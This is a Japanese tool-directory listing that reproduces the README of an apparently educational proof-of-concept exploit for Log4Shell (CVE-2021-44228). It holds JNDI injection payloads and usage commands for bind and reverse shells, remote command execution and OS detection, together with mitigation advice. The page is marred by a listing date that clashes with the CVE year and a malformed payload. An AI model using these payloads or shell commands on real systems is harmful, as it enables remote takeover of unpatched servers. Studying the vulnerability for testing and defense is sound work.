Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228(Log4Shell)の概念実証エクスプロイト。HTTPおよびLDAPサーバーを備え、リバース/バインドシェル、RCE、時間ベースの検出を教育用にサポートします。 | Kitploit
ツール/GitHubGitHub/thearqsz/cve-2021-44228-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228(Log4Shell)の概念実証エクスプロイト。HTTPおよびLDAPサーバーを備え、リバース/バインドシェル、RCE、時間ベースの検出を教育用にサポートします。

リポジトリを見る
24年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44228 PoC

CVE-2021-44228 の PoC。

このプロジェクトは教育目的のみで作成されました。

エクスプロイトサーバー

このプロジェクトは、http サーバーと ldap サーバーの 2 つを作成します。両方ともエクスプロイトが動作するために必要です。指定された Java ファイルがコンパイルされ、Dockerfile 内でサーバーが起動されます。ペイロードはユーザーに表示され、脆弱なアプリケーションに渡す必要があります。

ペイロードの例:

${jndi:ldap//127.0.0.1:1389/a}

実行方法

  • バインドシェル
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • リバースシェル
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • 時間ベースの脆弱性検出

プログラムを 25 秒間スリープさせます

./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • OS 検出
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

OS 検出では 4 文字が返される可能性があります:

  • L は Linux
  • W は Windows
  • M は MacOS
  • U は不明

バイパス

バイパス手法が公開されました。例はこちら

脆弱なアプリケーション

このアプリは、動作の仕組みを示すために設計されました。アプリで jar をビルドして実行するには、次を使用します:

./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

ここで PAYLOAD は ./poc.sh スクリプトから返されます(例: ${jndi:ldap://127.0.0.1:1389/1})。

クレジット

このエクスプロイトの作成中に使用されたプロジェクトとウェブサイトへの謝辞:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

自分を守るには?

log4j2.formatMsgNoLookups を true に設定して log4j を使用するアプリを起動するか、log4j-2.15.0-rc1 以降にアップデートしてください。アップデートは実際にリリースされています。できるだけ早く適用してください。

免責事項

このプロジェクトは教育目的のみで使用できます。事前の許可なく対象システムに対してこのソフトウェアを使用することは違法であり、このソフトウェアの誤用によるいかなる損害も作者の責任ではありません。

ツールをダウンロード